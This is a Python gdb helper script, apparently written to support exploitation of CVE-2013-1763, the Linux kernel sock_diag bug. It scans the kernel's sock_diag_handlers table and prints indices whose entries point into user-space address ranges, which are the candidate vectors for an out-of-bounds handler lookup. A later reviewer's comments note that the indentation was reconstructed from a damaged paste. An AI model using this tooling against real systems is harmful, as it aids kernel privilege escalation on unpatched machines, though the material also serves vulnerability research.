- '''
- Automatic vector finder for CVE-2013-1763
- just feed it the address of sock_diag_handlers ( for count 256 is fine )
- ocean ### https://twitter.com/_ocean
- '''
- import struct
- import subprocess
- import re
- import sys
- import os
- import gdb
def find_location(base,count):
    """Scan a table of 32-bit words in the debuggee and print candidate slots.

    Reads ``count`` little-endian 4-byte words starting at ``base`` from the
    first gdb inferior, then walks indices 1..count-1 (index 0 is skipped).
    Two kinds of slot are printed:

    * the word is above 0xBF000000 and the second 32-bit word stored at the
      address it points to lies in [4096, 0xBF000000);
    * the word itself lies in [4096, 0xBF000000).

    Per the module docstring, ``base`` is expected to be the address of
    ``sock_diag_handlers`` (CVE-2013-1763). Each printed line is therefore a
    table index whose slot, or the object it points to, holds a value in the
    range this script treats as user space. Rejecting such indices before
    the table lookup is the control that removes the issue.

    Returns True once the scan has finished, or False after printing any
    exception other than an unreadable-pointer error.

    NOTE(review): the nesting below is reconstructed from a paste that lost
    its indentation; the 32-bit address split is hard-coded, not read from
    the target.
    """
    mask32 = 0xFFFFFFFF  # keep every comparison unsigned and 32 bits wide
    user_floor = 4096 & mask32  # lower bound the author calls mmap_min_addr
    user_ceiling = int("0xBF000000",16) & mask32  # author's user-space upper limit

    def read_u32(address):
        # One little-endian 32-bit read from the first inferior's memory.
        raw = gdb.inferiors()[0].read_memory(address, 4)
        return struct.unpack('<I', raw)[0]

    try:
        # Snapshot the whole table once; slots are decoded from this copy.
        table = gdb.inferiors()[0].read_memory(base, count*4)
        for index in range(1, count):
            offset = index * 4
            word = struct.unpack('<I', table[offset:offset + 4])[0]
            masked = word & mask32
            try:
                if masked > user_ceiling:
                    # Slot holds an address above the split: inspect the two
                    # words stored there and report it when the second one
                    # falls back inside the user range.
                    first = read_u32(word)
                    second = read_u32(word + 4)
                    if user_floor <= (second & mask32) < user_ceiling:
                        print("["+hex(index)+"] "+hex(base+offset)+" = "+hex(first)+"\t"+hex(second))
                elif user_floor <= masked < user_ceiling:
                    # Slot value itself already lies in the user range.
                    print("possible location in uspace ["+hex(index)+"] "+hex(base+offset)+" = "+hex(word))
            except gdb.MemoryError:
                # Slot value is not a readable address; move to the next index.
                continue
        return True
    except Exception as err:
        print(err)
        return False